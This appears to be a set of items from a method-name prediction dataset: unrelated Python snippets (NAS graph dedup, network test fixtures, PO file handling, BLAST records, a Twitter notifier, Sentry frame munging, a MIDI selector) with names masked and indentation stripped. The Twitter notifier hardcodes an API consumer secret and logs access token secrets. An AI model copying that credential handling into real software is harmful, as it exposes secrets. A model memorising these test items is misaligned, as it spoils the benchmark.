# NOTE(yuge): I think this is buggy. But I'm not sure whether I should fix it.
from nni.nas.execution.cgo.evaluator import MultiModelLightningModule
_supported_evaluators = (MultiModelLightningModule, )
return isinstance(evaluator, _supported_evaluators)
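    # Two '_inputs' nodes are considered duplicates when both are OriginNodes whose
    # models share the same evaluator (and that evaluator is not one of the multi-model
    # evaluators rejected above).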
def METHOD_NAME(self, root_node, node_to_check):
if root_node == node_to_check:
return True
if root_node.operation.type == '_inputs' and \
node_to_check.operation.type == '_inputs' and \
isinstance(root_node, OriginNode) and \
isinstance(node_to_check, OriginNode):
if self._check_supported_evaluator(root_node.original_graph.model.evaluator):
return False
if root_node.original_graph.model.evaluator == node_to_check.original_graph.model.evaluator:
return True
else:
return False
else:
return False
def convert(self, logical_plan: LogicalPlan) -> None:
nodes_to_skip = set()
while True: # repeat until the logical_graph converges
input_nodes = logical_plan.logical_graph.get_nodes_by_type("_inputs")
# _PseudoOperation(type_name="_inputs"))
root_node = None
for node in input_nodes:
if node in nodes_to_skip:
continue
root_node = node
break
if root_node is None:
break # end of convert
else:
nodes_to_dedup = []
for node in input_nodes:
if node in nodes_to_skip:
continue
if self.METHOD_NAME(root_node, node):
nodes_to_dedup.append(node)
assert(len(nodes_to_dedup) >= 1)
if len(nodes_to_dedup) == 1:
assert(nodes_to_dedup[0] == root_node)
nodes_to_skip.add(root_node)
else:
dedup_node = DedupInputNode(logical_plan.logical_graph, uid(), nodes_to_dedup)._register()
for edge in logical_plan.logical_graph.edges:
if edge.head in nodes_to_dedup:
edge.head = dedup_node
if edge.tail in nodes_to_dedup:
edge.tail = dedup_node
for node in nodes_to_dedup:
node.remove() | null |
minigraph facts | import logging
import pytest
from ipaddress import ip_interface
from constants import ENI, VM_VNI, VNET1_VNI, VNET2_VNI, REMOTE_CA_IP, LOCAL_CA_IP, REMOTE_ENI_MAC,\
LOCAL_ENI_MAC, REMOTE_CA_PREFIX, LOOPBACK_IP, DUT_MAC, LOCAL_PA_IP, LOCAL_PTF_INTF, LOCAL_PTF_MAC,\
REMOTE_PA_IP, REMOTE_PTF_INTF, REMOTE_PTF_MAC, REMOTE_PA_PREFIX, VNET1_NAME, VNET2_NAME, ROUTING_ACTION, \
ROUTING_ACTION_TYPE, LOOKUP_OVERLAY_IP
from dash_utils import render_template_to_host, apply_swssconfig_file
logger = logging.getLogger(__name__)
def pytest_addoption(parser):
"""
Adds pytest options that are used by DASH tests
"""
parser.addoption(
"--skip_config",
action="store_true",
help="Don't apply configurations on DUT"
)
parser.addoption(
"--config_only",
action="store_true",
help="Apply new configurations on DUT without running tests"
)
parser.addoption(
"--skip_cleanup",
action="store_true",
help="Skip config cleanup after test"
)
@pytest.fixture(scope="module")
def config_only(request):
return request.config.getoption("--config_only")
@pytest.fixture(scope="module")
def skip_config(request):
return request.config.getoption("--skip_config")
@pytest.fixture(scope="module")
def skip_cleanup(request):
return request.config.getoption("--skip_cleanup")
@pytest.fixture(scope="module")
def config_facts(duthost):
return duthost.config_facts(host=duthost.hostname, source="running")['ansible_facts']
@pytest.fixture(scope="module")
def METHOD_NAME(duthosts, rand_one_dut_hostname, tbinfo):
"""
Fixture to get minigraph facts
Args:
duthost: DUT host object
Returns:
Dictionary containing minigraph information
"""
duthost = duthosts[rand_one_dut_hostname]
return duthost.get_extended_minigraph_facts(tbinfo)
def get_intf_from_ip(local_ip, config_facts):
for intf, config in list(config_facts["INTERFACE"].items()):
for ip in config:
intf_ip = ip_interface(ip)
if str(intf_ip.ip) == local_ip:
return intf, intf_ip
@pytest.fixture(params=["no-underlay-route", "with-underlay-route"])
def use_underlay_route(request):
if request.param == "with-underlay-route":
pytest.skip("Underlay route not supported yet")
return request.param == "with-underlay-route"
@pytest.fixture(scope="function")
def dash_config_info(duthost, config_facts, METHOD_NAME):
dash_info = {
ENI: "F4939FEFC47E",
VM_VNI: 4321,
VNET1_VNI: 1000,
VNET1_NAME: "Vnet1",
VNET2_VNI: 2000,
VNET2_NAME: "Vnet2",
REMOTE_CA_IP: "20.2.2.2",
LOCAL_CA_IP: "11.1.1.1",
REMOTE_ENI_MAC: "F9:22:83:99:22:A2",
LOCAL_ENI_MAC: "F4:93:9F:EF:C4:7E",
REMOTE_CA_PREFIX: "20.2.2.0/24",
}
loopback_intf_ip = ip_interface(list(list(config_facts["LOOPBACK_INTERFACE"].values())[0].keys())[0])
dash_info[LOOPBACK_IP] = str(loopback_intf_ip.ip)
dash_info[DUT_MAC] = config_facts["DEVICE_METADATA"]["localhost"]["mac"]
neigh_table = duthost.switch_arptable()['ansible_facts']['arptable']
for neigh_ip, config in list(config_facts["BGP_NEIGHBOR"].items()):
# Pick the first two BGP neighbor IPs since these should already be learned on the DUT
if ip_interface(neigh_ip).version == 4:
if LOCAL_PA_IP not in dash_info:
dash_info[LOCAL_PA_IP] = neigh_ip
intf, _ = get_intf_from_ip(config['local_addr'], config_facts)
dash_info[LOCAL_PTF_INTF] = METHOD_NAME["minigraph_ptf_indices"][intf]
dash_info[LOCAL_PTF_MAC] = neigh_table["v4"][neigh_ip]["macaddress"]
elif REMOTE_PA_IP not in dash_info:
dash_info[REMOTE_PA_IP] = neigh_ip
intf, intf_ip = get_intf_from_ip(config['local_addr'], config_facts)
dash_info[REMOTE_PTF_INTF] = METHOD_NAME["minigraph_ptf_indices"][intf]
dash_info[REMOTE_PTF_MAC] = neigh_table["v4"][neigh_ip]["macaddress"]
dash_info[REMOTE_PA_PREFIX] = str(intf_ip.network)
break
return dash_info
@pytest.fixture(scope="function")
def apply_config(duthost, skip_config, skip_cleanup):
configs = []
op = "SET"
def _apply_config(config_info):
if skip_config:
return
if config_info not in configs:
configs.append(config_info)
config = "dash_basic_config"
template_name = "{}.j2".format(config)
dest_path = "/tmp/{}.json".format(config)
render_template_to_host(template_name, duthost, dest_path, config_info, op=op)
apply_swssconfig_file(duthost, dest_path)
yield _apply_config
op = "DEL"
if not skip_cleanup:
for config_info in reversed(configs):
_apply_config(config_info)
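# Usage note (describes the fixtures below, no new behavior): a test requests
# one of the apply_* fixtures, which calls _apply_config with op="SET" to
# render dash_basic_config.j2 onto the DUT; unless --skip_cleanup is given,
# the same configs are re-applied with op="DEL" in reverse order at teardown.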
@pytest.fixture(scope="function")
def dash_inbound_configs(dash_config_info, use_underlay_route, METHOD_NAME):
if use_underlay_route:
dash_config_info[LOCAL_PA_IP] = u"30.30.30.30"
dash_config_info[LOCAL_PTF_INTF] = list(METHOD_NAME["minigraph_ptf_indices"].values())
else:
dash_config_info[LOCAL_PTF_INTF] = [dash_config_info[LOCAL_PTF_INTF]]
logger.info("Testing with config {}".format(dash_config_info))
return dash_config_info
@pytest.fixture(scope="function")
def apply_inbound_configs(dash_inbound_configs, apply_config):
dash_inbound_configs[ROUTING_ACTION] = "vnet"
apply_config(dash_inbound_configs)
@pytest.fixture(scope="function")
def dash_outbound_configs(dash_config_info, use_underlay_route, METHOD_NAME):
if use_underlay_route:
dash_config_info[REMOTE_PA_IP] = u"30.30.30.30"
dash_config_info[REMOTE_PA_PREFIX] = "30.30.30.30/32"
dash_config_info[REMOTE_PTF_INTF] = list(METHOD_NAME["minigraph_ptf_indices"].values())
else:
dash_config_info[REMOTE_PTF_INTF] = [dash_config_info[REMOTE_PTF_INTF]]
logger.info("Testing with config {}".format(dash_config_info))
return dash_config_info
@pytest.fixture(scope="function")
def apply_vnet_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "vnet"
apply_config(dash_outbound_configs)
@pytest.fixture(scope="function")
def apply_vnet_direct_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "vnet_direct"
dash_outbound_configs[ROUTING_ACTION_TYPE] = "maprouting"
dash_outbound_configs[LOOKUP_OVERLAY_IP] = "1.1.1.1"
apply_config(dash_outbound_configs)
@pytest.fixture(scope="function")
def apply_direct_configs(dash_outbound_configs, apply_config):
dash_outbound_configs[ROUTING_ACTION] = "direct"
del dash_outbound_configs[VNET2_NAME]
apply_config(dash_outbound_configs) | null |
merge on | #
# Copyright 2002-2011 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
import re
from urllib import parse
from translate.storage import base, poheader
from translate.storage.workflow import StateEnum as state
msgid_comment_re = re.compile("_: (.*?)\n")
def extract_msgid_comment(text):
"""The one definitive way to extract a msgid comment out of an unescaped
unicode string that might contain it.
:rtype: unicode
"""
msgidcomment = msgid_comment_re.match(text)
if msgidcomment:
return msgidcomment.group(1)
return ""
def quote_plus(text):
"""Quote the query fragment of a URL; replacing ' ' with '+'"""
return parse.quote_plus(text.encode("utf-8"), safe="[]()/:,@")
def unquote_plus(text):
"""unquote('%7e/abc+def') -> '~/abc def'"""
try:
# Enforce utf-8 validation
return parse.unquote_plus(text, errors="strict")
except (UnicodeEncodeError, UnicodeDecodeError):
# for some reason there is a non-ascii character here. Let's assume it
# is already unicode (because of originally decoding the file)
return text
class pounit(base.TranslationUnit):
S_FUZZY_OBSOLETE = state.OBSOLETE - 1
S_OBSOLETE = state.OBSOLETE
S_UNTRANSLATED = state.EMPTY
S_FUZZY = state.NEEDS_WORK
S_TRANSLATED = state.UNREVIEWED
STATE = {
S_FUZZY_OBSOLETE: (S_FUZZY_OBSOLETE, state.OBSOLETE),
S_OBSOLETE: (state.OBSOLETE, state.EMPTY),
S_UNTRANSLATED: (state.EMPTY, state.NEEDS_WORK),
S_FUZZY: (state.NEEDS_WORK, state.UNREVIEWED),
S_TRANSLATED: (state.UNREVIEWED, state.MAX),
}
def adderror(self, errorname, errortext):
"""Adds an error message to this unit."""
text = f"(pofilter) {errorname}: {errortext}"
# Don't add the same error twice:
if text not in self.getnotes(origin="translator"):
self.addnote(text, origin="translator")
def geterrors(self):
"""Get all error messages."""
notes = self.getnotes(origin="translator").split("\n")
errordict = {}
for note in notes:
if "(pofilter) " in note:
error = note.replace("(pofilter) ", "")
errorname, errortext = error.split(": ", 1)
errordict[errorname] = errortext
return errordict
def markreviewneeded(self, needsreview=True, explanation=None):
"""Marks the unit to indicate whether it needs review. Adds an optional explanation as a note."""
if needsreview:
reviewnote = "(review)"
if explanation:
reviewnote += " " + explanation
self.addnote(reviewnote, origin="translator")
else:
# Strip (review) notes.
notestring = self.getnotes(origin="translator")
notes = notestring.split("\n")
newnotes = []
for note in notes:
if "(review)" not in note:
newnotes.append(note)
newnotes = "\n".join(newnotes)
self.removenotes()
self.addnote(newnotes, origin="translator")
def istranslated(self):
return super().istranslated() and not self.isobsolete() and not self.isheader()
def istranslatable(self):
return not (self.isheader() or self.isblank() or self.isobsolete())
def hasmarkedcomment(self, commentmarker):
raise NotImplementedError
def isreview(self):
return self.hasmarkedcomment("review") or self.hasmarkedcomment("pofilter")
def isobsolete(self):
return (
self.STATE[self.S_FUZZY_OBSOLETE][0]
<= self.get_state_n()
< self.STATE[self.S_OBSOLETE][1]
)
def isfuzzy(self):
# implementation specific fuzzy detection, must not use get_state_n()
raise NotImplementedError()
def markfuzzy(self, present=True):
if present:
self.set_state_n(self.STATE[self.S_FUZZY][0])
else:
self.set_state_n(self.STATE[self.S_TRANSLATED][0])
# set_state_n will check if target exists
def makeobsolete(self):
if self.isfuzzy():
self.set_state_n(self.STATE[self.S_FUZZY_OBSOLETE][0])
else:
self.set_state_n(self.STATE[self.S_OBSOLETE][0])
def resurrect(self):
self.set_state_n(self.STATE[self.S_TRANSLATED][0])
if not self.target:
self.set_state_n(self.STATE[self.S_UNTRANSLATED][0])
def _domarkfuzzy(self, present=True):
raise NotImplementedError()
def get_state_n(self):
value = super().get_state_n()
if value <= self.S_OBSOLETE:
return value
if self.target:
if self.isfuzzy():
return self.S_FUZZY
else:
return self.S_TRANSLATED
else:
return self.S_UNTRANSLATED
def set_state_n(self, value):
super().set_state_n(value)
has_target = False
if self.hasplural():
for string in self.target.strings:
if string:
has_target = True
break
else:
has_target = bool(self.target)
if has_target:
isfuzzy = (
self.STATE[self.S_FUZZY][0] <= value < self.STATE[self.S_FUZZY][1]
or self.STATE[self.S_FUZZY_OBSOLETE][0]
<= value
< self.STATE[self.S_FUZZY_OBSOLETE][1]
)
self._domarkfuzzy(isfuzzy) # Implementation specific fuzzy-marking
else:
super().set_state_n(self.S_UNTRANSLATED)
self._domarkfuzzy(False)
class pofile(poheader.poheader, base.TranslationStore):
Name = "Gettext PO file" # pylint: disable=E0602
Mimetypes = [
"text/x-gettext-catalog",
"text/x-gettext-translation",
"text/x-po",
"text/x-pot",
]
Extensions = ["po", "pot"]
# We don't want windows line endings on Windows:
_binary = True
def __init__(self, inputfile=None, noheader=False, **kwargs):
super().__init__(**kwargs)
self.filename = ""
if inputfile is not None:
self.parse(inputfile)
elif not noheader:
self.init_headers()
@property
def METHOD_NAME(self):
"""The matching criterion to use when merging on."""
return self.parseheader().get("X-Merge-On", "id") | null |
get nuvs blast | from logging import getLogger
from typing import List, TYPE_CHECKING
from zipfile import BadZipFile
from aiohttp import ClientSession
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncEngine, AsyncSession
from virtool_core.models.blast import NuvsBlast
import virtool.utils
from virtool.analyses.utils import find_nuvs_sequence_by_index
from virtool.blast.db import METHOD_NAME, delete_nuvs_blast
from virtool.blast.models import SQLNuVsBlast
from virtool.blast.task import BLASTTask
from virtool.blast.utils import (
extract_blast_info,
fetch_ncbi_blast_html,
check_rid,
)
from virtool.blast.utils import format_blast_content, fetch_nuvs_blast_result
from virtool.data.errors import ResourceNotFoundError
from virtool.data.piece import DataLayerPiece
from virtool.types import Document
if TYPE_CHECKING:
from virtool.mongo.core import Mongo
logger = getLogger(__name__)
class BLASTData(DataLayerPiece):
"""
A data layer piece for BLAST data.
"""
name = "blast"
def __init__(self, client: ClientSession, mongo: "Mongo", pg: AsyncEngine):
self._client = client
self._mongo = mongo
self._pg = pg
async def create_nuvs_blast(
self, analysis_id: str, sequence_index: int
) -> NuvsBlast:
"""
Create a NuVs BLAST record for the sequence associated with a specific analysis
ID and sequence index.
A task will be spawned that runs a BLAST search against NCBI and populates the
database with the result. The analysis and BLAST records are updated as the task
proceeds.
:param analysis_id: the ID for the analysis to create BLAST for
:param sequence_index: the index of the sequence being BLASTed.
:return: the dictionary representation of the BLAST record.
"""
created_at = virtool.utils.timestamp()
async with AsyncSession(self._pg) as session:
await delete_nuvs_blast(session, analysis_id, sequence_index)
await session.flush()
blast_row = SQLNuVsBlast(
analysis_id=analysis_id,
created_at=created_at,
last_checked_at=created_at,
ready=False,
sequence_index=sequence_index,
updated_at=created_at,
)
session.add(blast_row)
await session.flush()
await self.data.tasks.create(
BLASTTask,
{"analysis_id": analysis_id, "sequence_index": sequence_index},
)
blast = NuvsBlast(**blast_row.to_dict())
# Don't commit until the task has been created.
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id}, {"$set": {"updated_at": created_at}}
)
return blast
async def initialize_on_ncbi(self, analysis_id: str, sequence_index: int):
"""
Send a request to NCBI to BLAST the passed sequence.
Store the returned RID on the BLAST record.
:param analysis_id: the id of the nuvs analysis
:param sequence_index: the index of the sequence
:return: the updated BLAST record with the RID set
"""
analysis = await self.data.analyses.get(analysis_id, None)
sequence = find_nuvs_sequence_by_index(
analysis.dict(by_alias=True), sequence_index
)
html = await fetch_ncbi_blast_html(self._client, sequence)
rid, _ = extract_blast_info(html)
async with AsyncSession(self._pg) as session:
blast_row = await METHOD_NAME(session, analysis_id, sequence_index)
if blast_row is None:
raise ResourceNotFoundError
blast_row.rid = rid
blast = NuvsBlast(**blast_row.to_dict())
await session.commit()
return blast
async def METHOD_NAME(self, analysis_id: str, sequence_index: int) -> NuvsBlast:
"""
Get a NuVs BLAST record by its analysis ID and sequence index.
:param analysis_id: the ID of the analysis the BLAST belongs to
:param sequence_index: the index of the BLASTed NuVs sequence
:return: the dictionary representation of the BLAST record
"""
async with AsyncSession(self._pg) as session:
blast = await METHOD_NAME(session, analysis_id, sequence_index)
return NuvsBlast(**blast.to_dict())
async def check_nuvs_blast(
self,
analysis_id: str,
sequence_index: int,
):
"""
Sync our BLAST resource with NCBI.
Send a request to NCBI to check on the status of a BLAST request. Update the
``last_checked_at`` field.
If the BLAST result is ready:
1. Set the `ready` field to `true`.
2. Download the result and set the JSON as the value of the `result` field.
If an error is encountered while parsing the result, the `error` field is set.
"""
updated_at = virtool.utils.timestamp()
async with AsyncSession(self._pg) as session:
blast_row = await METHOD_NAME(session, analysis_id, sequence_index)
if blast_row is None:
raise ResourceNotFoundError
ready = await check_rid(self._client, blast_row.rid)
blast_row.last_checked_at = updated_at
blast_row.updated_at = updated_at
if ready:
try:
result_json = await fetch_nuvs_blast_result(
self._client, blast_row.rid
)
blast_row.result = format_blast_content(result_json)
blast_row.ready = True
except BadZipFile:
blast_row.error = "Unable to interpret NCBI result"
await session.flush()
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id},
{"$set": {"updated_at": updated_at}},
)
return await self.METHOD_NAME(analysis_id, sequence_index)
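# Note on the method above (purely descriptive): each call refreshes
# last_checked_at/updated_at, and once NCBI reports the RID as ready it either
# stores the formatted result and sets `ready`, or records a parse error; the
# refreshed record is then returned via the getter.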
async def delete_nuvs_blast(self, analysis_id: str, sequence_index: int) -> int:
"""
Remove a NuVs BLAST record.
:param analysis_id: the analysis the BLAST belongs to
:param sequence_index: the index of the BLASTed NuVs sequence
:return: the number of deleted records
"""
async with AsyncSession(self._pg) as session:
deleted_count = await delete_nuvs_blast(
session, analysis_id, sequence_index
)
await session.commit()
await self._mongo.analyses.update_one(
{"_id": analysis_id}, {"$set": {"updated_at": virtool.utils.timestamp()}}
)
return deleted_count
async def list_by_analysis(self, analysis_id: str) -> List[Document]:
"""
Get all BLAST records associated with an analysis.
:param analysis_id: the ID of the analysis to list BLASTs for
:return: a list of BLAST records
"""
async with AsyncSession(self._pg) as session:
result = await session.execute(
select(SQLNuVsBlast).where(SQLNuVsBlast.analysis_id == analysis_id)
)
return [
{
"id": blast.id,
"created_at": blast.created_at,
"updated_at": blast.updated_at,
"last_checked_at": blast.last_checked_at,
"interval": blast.interval,
"rid": blast.rid,
"ready": blast.ready,
"result": blast.result,
}
for blast in result.scalars()
] | null |
notify download | import requests
import twitter
from requests_oauthlib import OAuth1Session
from sickchill import logger, settings
from sickchill.oldbeard import common
class Notifier(object):
consumer_key = "vHHtcB6WzpWDG6KYlBMr8g"
consumer_hash = "zMqq5CB3f8cWKiRO2KzWPTlBanYmV0VYxSXZ0Pxds0E" # (consumer_secret)
REQUEST_TOKEN_URL = "https://api.twitter.com/oauth/request_token"
ACCESS_TOKEN_URL = "https://api.twitter.com/oauth/access_token"
AUTHORIZATION_URL = "https://api.twitter.com/oauth/authorize"
def notify_snatch(self, ep_name):
if settings.TWITTER_NOTIFY_ONSNATCH:
self._notify_twitter(common.notifyStrings[common.NOTIFY_SNATCH] + ": " + ep_name)
def METHOD_NAME(self, ep_name):
if settings.TWITTER_NOTIFY_ONDOWNLOAD:
self._notify_twitter(common.notifyStrings[common.NOTIFY_DOWNLOAD] + ": " + ep_name)
def notify_subtitle_download(self, ep_name, lang):
if settings.TWITTER_NOTIFY_ONSUBTITLEDOWNLOAD:
self._notify_twitter(common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD] + " " + ep_name + ": " + lang)
def notify_update(self, new_version="??"):
if settings.USE_TWITTER:
update_text = common.notifyStrings[common.NOTIFY_UPDATE_TEXT]
title = common.notifyStrings[common.NOTIFY_UPDATE]
self._notify_twitter(title + " - " + update_text + new_version)
def notify_login(self, ipaddress=""):
if settings.USE_TWITTER:
update_text = common.notifyStrings[common.NOTIFY_LOGIN_TEXT]
title = common.notifyStrings[common.NOTIFY_LOGIN]
self._notify_twitter(title + " - " + update_text.format(ipaddress))
def test_notify(self):
"""
Tests sending notification.
:return: True if succeeded, False otherwise
"""
return self._notify_twitter("This is a test notification from SickChill", force=True)
def _get_authorization(self):
"""
Step 1 of authorization - get app authorization url.
:return: the app authorization URL if succeeded, None otherwise
"""
logger.debug("Requesting temp token from Twitter")
oauth_session = OAuth1Session(client_key=self.consumer_key, client_secret=self.consumer_hash)
try:
request_token = oauth_session.fetch_request_token(self.REQUEST_TOKEN_URL)
except requests.exceptions.RequestException as error:
logger.exception(f"Invalid response from Twitter requesting temp token: {error}")
else:
settings.TWITTER_USERNAME = request_token["oauth_token"]
settings.TWITTER_PASSWORD = request_token["oauth_token_secret"]
return oauth_session.authorization_url(self.AUTHORIZATION_URL)
def _get_credentials(self, key):
logger.info("Type of key is {}".format(type(key)))
"""
Step 2 of authorization - poll server for access token.
:param key: Authorization key received from twitter
:return: True if succeeded, False otherwise
"""
logger.debug("Generating and signing request for an access token using key " + key)
oauth_session = OAuth1Session(
client_key=self.consumer_key,
client_secret=self.consumer_hash,
resource_owner_key=settings.TWITTER_USERNAME,
resource_owner_secret=settings.TWITTER_PASSWORD,
)
try:
access_token = oauth_session.fetch_access_token(self.ACCESS_TOKEN_URL, verifier=str(key))
except Exception as error:
logger.exception(f"The request for a token with did not succeed: {error}")
return False
logger.debug("Your Twitter Access Token key: {0}".format(access_token["oauth_token"]))
logger.debug("Access Token secret: {0}".format(access_token["oauth_token_secret"]))
settings.TWITTER_USERNAME = access_token["oauth_token"]
settings.TWITTER_PASSWORD = access_token["oauth_token_secret"]
return True
def _send_tweet(self, message=None):
"""
Sends a tweet.
:param message: Message to send
:return: True if succeeded, False otherwise
"""
api = twitter.Api(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_hash,
access_token_key=settings.TWITTER_USERNAME,
access_token_secret=settings.TWITTER_PASSWORD,
)
logger.debug("Sending tweet: {}".format(message))
try:
api.PostUpdate(message[:139])
except Exception as error:
logger.exception(f"Error Sending Tweet: {error}")
return False
return True
def _send_dm(self, message=None):
"""
Sends a direct message.
:param message: Message to send
:return: True if succeeded, False otherwise
"""
dmdest = settings.TWITTER_DMTO
api = twitter.Api(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_hash,
access_token_key=settings.TWITTER_USERNAME,
access_token_secret=settings.TWITTER_PASSWORD,
)
logger.debug("Sending DM @{0}: {1}".format(dmdest, message))
try:
api.PostDirectMessage(message[:139], screen_name=dmdest)
except Exception as error:
logger.exception(f"Error Sending Tweet (DM): {error}")
return False
return True
def _notify_twitter(self, message="", force=False):
prefix = settings.TWITTER_PREFIX
if not settings.USE_TWITTER and not force:
return False
if settings.TWITTER_USEDM and settings.TWITTER_DMTO:
return self._send_dm(prefix + ": " + message)
else:
return self._send_tweet(prefix + ": " + message) | null |
get crashing thread | from __future__ import annotations
from copy import deepcopy
from dataclasses import dataclass, field
from typing import (
Any,
Callable,
Mapping,
MutableMapping,
Optional,
Protocol,
Sequence,
Set,
Tuple,
cast,
)
from sentry.utils.safe import PathSearchable, get_path
# mypy hack to work around Callable assuming the first arg of a callable is 'self'
# https://github.com/python/mypy/issues/5485
class FrameMunger(Protocol):
def __call__(self, key: str, frame: MutableMapping[str, Any]) -> bool:
pass
@dataclass(frozen=True)
class SdkFrameMunger:
frame_munger: FrameMunger
requires_sdk: bool = False
supported_sdks: Set[str] = field(default_factory=set)
def java_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if frame.get("filename") is None or frame.get("module") is None:
return False
if "/" not in str(frame.get("filename")) and frame.get("module"):
# Replace the last module segment with the filename, as the
# terminal element in a module path is the class
module = frame["module"].split(".")
module[-1] = frame["filename"]
frame[key] = "/".join(module)
return True
return False
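# Illustrative example (hypothetical frame): for
# {"module": "com.example.app.MainActivity", "filename": "MainActivity.java"},
# java_frame_munger stores "com/example/app/MainActivity.java" under `key`.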
def cocoa_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if not frame.get("package") or not frame.get("abs_path"):
return False
rel_path = package_relative_path(frame.get("abs_path"), frame.get("package"))
if rel_path:
frame[key] = rel_path
return True
return False
def flutter_frame_munger(key: str, frame: MutableMapping[str, Any]) -> bool:
if not frame.get("abs_path"):
return False
abs_path = str(frame.get("abs_path"))
if abs_path.startswith("dart:"):
return False
elif abs_path.startswith("package:"):
if not frame.get("package"):
return False
pkg = frame.get("package")
if abs_path.find(f"package:{pkg}") == -1:
return False
else:
src_path = abs_path.replace(f"package:{pkg}", "", 1).strip("/")
if src_path:
frame[key] = src_path
return True
return False
def package_relative_path(abs_path: str | None, package: str | None) -> str | None:
"""
returns the left-biased shortened path relative to the package directory
"""
if not abs_path or not package:
return None
package = package.strip("/")
paths = abs_path.strip("/").split("/")
for idx, path in enumerate(paths):
if path == package:
return "/".join(paths[idx:])
return None
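# Illustrative example (hypothetical paths):
# package_relative_path("/var/containers/Bundle/App.app/Frameworks/App", "App.app")
# returns "App.app/Frameworks/App"; if the package never appears in the path,
# None is returned.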
PLATFORM_FRAME_MUNGER: Mapping[str, SdkFrameMunger] = {
"java": SdkFrameMunger(java_frame_munger),
"cocoa": SdkFrameMunger(cocoa_frame_munger),
"other": SdkFrameMunger(flutter_frame_munger, True, {"sentry.dart.flutter"}),
}
def get_sdk_name(event_data: PathSearchable) -> Optional[str]:
return get_path(event_data, "sdk", "name", filter=True) or None
def munged_filename_and_frames(
platform: str,
data_frames: Sequence[Mapping[str, Any]],
key: str = "munged_filename",
sdk_name: str | None = None,
) -> Optional[Tuple[str, Sequence[Mapping[str, Any]]]]:
"""
Applies platform-specific frame munging for filename pathing.
Returns the key used to insert into the frames and a deepcopy of the input data_frames with munging applied,
otherwise returns None.
"""
munger = PLATFORM_FRAME_MUNGER.get(platform)
if not munger or (munger.requires_sdk and sdk_name not in munger.supported_sdks):
return None
copy_frames: Sequence[MutableMapping[str, Any]] = cast(
Sequence[MutableMapping[str, Any]], deepcopy(data_frames)
)
frames_updated = False
for frame in copy_frames:
frames_updated |= munger.frame_munger(key, frame)
return (key, copy_frames) if frames_updated else None
def METHOD_NAME(
thread_frames: Sequence[Mapping[str, Any]] | None
) -> Mapping[str, Any] | None:
if not thread_frames:
return None
if len(thread_frames) == 1:
return thread_frames[0]
filtered = [x for x in thread_frames if x and x.get("crashed")]
if len(filtered) == 1:
return filtered[0]
filtered = [x for x in thread_frames if x and x.get("current")]
if len(filtered) == 1:
return filtered[0]
return None
def find_stack_frames(
event_data: PathSearchable, consume_frame: Callable[[Any], None] = lambda _: None
) -> Sequence[Mapping[str, Any]]:
"""
See: https://develop.sentry.dev/sdk/event-payloads/#core-interfaces for event data payload format.
Waterfall logic for searching for stack frames in an event:
- `exception` interface for any 'stacktrace' frames.
- 'stacktrace' interface
- 'threads' interface for the relevant 'crashing' thread stack frames
"""
frames = []
stacktrace_in_exception = False
for exc in get_path(event_data, "exception", "values", filter=True) or ():
for frame in get_path(exc, "stacktrace", "frames", filter=True) or ():
consume_frame(frame)
frames.append(frame)
stacktrace_in_exception = True
if not stacktrace_in_exception:
# according to: https://develop.sentry.dev/sdk/event-payloads/stacktrace/
# stacktrace interface shouldn't be a top-level event property, so the next statement could be useless
# potentially here for backwards compatibility
frames = get_path(event_data, "stacktrace", "frames", filter=True) or []
if not frames:
threads = get_path(event_data, "threads", "values", filter=True) or get_path(
event_data, "threads", filter=True
)
thread = METHOD_NAME(threads)
if thread is not None:
frames = get_path(thread, "stacktrace", "frames") or []
for frame in frames or ():
consume_frame(frame)
return frames | null |
set select path | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#******************************************************************************
# ZYNTHIAN PROJECT: Zynthian GUI
#
# Zynthian GUI Midi-Channel Selector Class
#
# Copyright (C) 2015-2016 Fernando Moyano <[email protected]>
#
#******************************************************************************
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the LICENSE.txt file.
#
#******************************************************************************
import logging
from datetime import datetime
# Zynthian specific modules
from zyncoder.zyncore import lib_zyncore
from zyngui import zynthian_gui_config
from zyngui.zynthian_gui_selector import zynthian_gui_selector
#------------------------------------------------------------------------------
# Zynthian MIDI Channel Selection GUI Class
#------------------------------------------------------------------------------
class zynthian_gui_midi_chan(zynthian_gui_selector):
def __init__(self):
self.set_mode('ADD')
super().__init__('Channel', True)
def set_mode(self, mode, chan=None, chan_list=None):
self.mode = mode
if chan_list:
self.chan_list = chan_list
else:
self.chan_list = list(range(16))
self.midi_chan_sel = None
self.midi_chan_act = None
if self.mode=='ADD':
pass
elif self.mode=='SET':
self.index = self.get_midi_chan_index(chan)
elif self.mode=='CLONE':
self.midi_chan = chan
def fill_list(self):
self.list_data=[]
if self.mode=='ADD' or self.mode=='SET':
for i in self.chan_list:
if i==zynthian_gui_config.master_midi_channel:
continue
self.list_data.append((str(i+1),i,"MIDI CH#"+str(i+1)))
elif self.mode=='CLONE':
for i in self.chan_list:
if i in (self.midi_chan, zynthian_gui_config.master_midi_channel):
continue
elif lib_zyncore.get_midi_filter_clone(self.midi_chan, i):
cc_to_clone = lib_zyncore.get_midi_filter_clone_cc(self.midi_chan, i).nonzero()[0]
self.list_data.append((str(i+1),i,"[x] CH#{}, CC {}".format(i+1, ' '.join(map(str, cc_to_clone)))))
logging.debug("CC TO CLONE: {}".format(cc_to_clone))
else:
